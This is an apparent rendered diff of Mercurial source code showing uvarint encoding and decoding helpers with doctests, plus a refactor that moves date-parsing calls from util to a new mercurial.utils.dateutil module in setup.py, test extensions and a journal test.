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4242 | each byte store the 2's complement representation, least significant group |
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4243 | first. |
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4244 |
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||||
4245 | >>> uvarintencode(0) |
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4246 | '\\x00' |
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4247 | >>> uvarintencode(1) |
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4248 | '\\x01' |
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4249 | >>> uvarintencode(127) |
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4250 | '\\x7f' |
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4251 | >>> uvarintencode(1337) |
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4252 | '\\xb9\\n' |
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4253 | >>> uvarintencode(65536) |
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4254 | '\\x80\\x80\\x04' |
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4255 | >>> uvarintencode(-1) |
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4256 | Traceback (most recent call last): |
|
|||
4257 | ... |
|
|||
4258 | ProgrammingError: negative value for uvarint: -1 |
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4259 | """ |
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4260 | if value < 0: |
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4261 | raise error.ProgrammingError('negative value for uvarint: %d' |
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4262 | % value) |
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4263 | bits = value & 0x7f |
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4264 | value >>= 7 |
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4265 | bytes = [] |
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|||
4266 | while value: |
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4267 | bytes.append(pycompat.bytechr(0x80 | bits)) |
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4268 | bits = value & 0x7f |
|
|||
4269 | value >>= 7 |
|
|||
4270 | bytes.append(pycompat.bytechr(bits)) |
|
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4271 |
|
||||
4272 | return ''.join(bytes) |
|
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4273 |
|
||||
4274 | def uvarintdecodestream(fh): |
|
|||
4275 | """Decode an unsigned variable length integer from a stream. |
|
|||
4276 |
|
||||
4277 | The passed argument is anything that has a ``.read(N)`` method. |
|
|||
4278 |
|
||||
4279 | >>> try: |
|
|||
4280 | ... from StringIO import StringIO as BytesIO |
|
|||
4281 | ... except ImportError: |
|
|||
4282 | ... from io import BytesIO |
|
|||
4283 | >>> uvarintdecodestream(BytesIO(b'\\x00')) |
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|||
4284 | 0 |
|
|||
4285 | >>> uvarintdecodestream(BytesIO(b'\\x01')) |
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|||
4286 | 1 |
|
|||
4287 | >>> uvarintdecodestream(BytesIO(b'\\x7f')) |
|
|||
4288 | 127 |
|
|||
4289 | >>> uvarintdecodestream(BytesIO(b'\\xb9\\n')) |
|
|||
4290 | 1337 |
|
|||
4291 | >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04')) |
|
|||
4292 | 65536 |
|
|||
4293 | >>> uvarintdecodestream(BytesIO(b'\\x80')) |
|
|||
4294 | Traceback (most recent call last): |
|
|||
4295 | ... |
|
|||
4296 | Abort: stream ended unexpectedly (got 0 bytes, expected 1) |
|
|||
4297 | """ |
|
|||
4298 | result = 0 |
|
|||
4299 | shift = 0 |
|
|||
4300 | while True: |
|
|||
4301 | byte = ord(readexactly(fh, 1)) |
|
|||
4302 | result |= ((byte & 0x7f) << shift) |
|
|||
4303 | if not (byte & 0x80): |
|
|||
4304 | return result |
|
|||
4305 | shift += 7 |
|
@@ -809,6 +809,7 b" packages = ['mercurial'," | |||||
809 | 'mercurial.pure', |
|
809 | 'mercurial.pure', | |
810 | 'mercurial.thirdparty', |
|
810 | 'mercurial.thirdparty', | |
811 | 'mercurial.thirdparty.attr', |
|
811 | 'mercurial.thirdparty.attr', | |
|
812 | 'mercurial.utils', | |||
812 | 'hgext', 'hgext.convert', 'hgext.fsmonitor', |
|
813 | 'hgext', 'hgext.convert', 'hgext.fsmonitor', | |
813 | 'hgext.fsmonitor.pywatchman', 'hgext.highlight', |
|
814 | 'hgext.fsmonitor.pywatchman', 'hgext.highlight', | |
814 | 'hgext.largefiles', 'hgext.lfs', 'hgext.narrow', |
|
815 | 'hgext.largefiles', 'hgext.lfs', 'hgext.narrow', |
@@ -13,8 +13,8 b' from mercurial import (' | |||||
13 | extensions, |
|
13 | extensions, | |
14 | policy, |
|
14 | policy, | |
15 | registrar, |
|
15 | registrar, | |
16 | util, |
|
|||
17 | ) |
|
16 | ) | |
|
17 | from mercurial.utils import dateutil | |||
18 |
|
18 | |||
19 | configtable = {} |
|
19 | configtable = {} | |
20 | configitem = registrar.configitem(configtable) |
|
20 | configitem = registrar.configitem(configtable) | |
@@ -49,7 +49,7 b' def fakewrite(ui, func):' | |||||
49 |
|
49 | |||
50 | # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between |
|
50 | # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between | |
51 | # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy |
|
51 | # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy | |
52 | fakenow = util.parsedate(fakenow, [b'%Y%m%d%H%M'])[0] |
|
52 | fakenow = dateutil.parsedate(fakenow, [b'%Y%m%d%H%M'])[0] | |
53 |
|
53 | |||
54 | orig_pack_dirstate = parsers.pack_dirstate |
|
54 | orig_pack_dirstate = parsers.pack_dirstate | |
55 | orig_dirstate_getfsnow = dirstate._getfsnow |
|
55 | orig_dirstate_getfsnow = dirstate._getfsnow |
@@ -7,8 +7,8 b' from mercurial import (' | |||||
7 | extensions, |
|
7 | extensions, | |
8 | patch as patchmod, |
|
8 | patch as patchmod, | |
9 | registrar, |
|
9 | registrar, | |
10 | util, |
|
|||
11 | ) |
|
10 | ) | |
|
11 | from mercurial.utils import dateutil | |||
12 |
|
12 | |||
13 | configtable = {} |
|
13 | configtable = {} | |
14 | configitem = registrar.configitem(configtable) |
|
14 | configitem = registrar.configitem(configtable) | |
@@ -30,7 +30,7 b' def internalpatch(orig, ui, repo, patcho' | |||||
30 | if fakenow: |
|
30 | if fakenow: | |
31 | # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between |
|
31 | # parsing 'fakenow' in YYYYmmddHHMM format makes comparison between | |
32 | # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy |
|
32 | # 'fakenow' value and 'touch -t YYYYmmddHHMM' argument easy | |
33 | fakenow = util.parsedate(fakenow, [b'%Y%m%d%H%M'])[0] |
|
33 | fakenow = dateutil.parsedate(fakenow, [b'%Y%m%d%H%M'])[0] | |
34 | for f in files: |
|
34 | for f in files: | |
35 | repo.wvfs.utime(f, (fakenow, fakenow)) |
|
35 | repo.wvfs.utime(f, (fakenow, fakenow)) | |
36 |
|
36 |
@@ -4,6 +4,7 b' Tests for the journal extension; records' | |||||
4 | > # mock out util.getuser() and util.makedate() to supply testable values |
|
4 | > # mock out util.getuser() and util.makedate() to supply testable values | |
5 | > import os |
|
5 | > import os | |
6 | > from mercurial import util |
|
6 | > from mercurial import util | |
|
7 | > from mercurial.utils import dateutil | |||
7 | > def mockgetuser(): |
|
8 | > def mockgetuser(): | |
8 | > return 'foobar' |
|
9 | > return 'foobar' | |
9 | > |
|
10 | > | |
@@ -19,7 +20,7 b' Tests for the journal extension; records' | |||||
19 | > return (time, 0) |
|
20 | > return (time, 0) | |
20 | > |
|
21 | > | |
21 | > util.getuser = mockgetuser |
|
22 | > util.getuser = mockgetuser | |
22 | > util.makedate = mockmakedate |
|
23 | > dateutil.makedate = mockmakedate | |
23 | > EOF |
|
24 | > EOF | |
24 |
|
25 | |||
25 | $ cat >> $HGRCPATH << EOF |
|
26 | $ cat >> $HGRCPATH << EOF |
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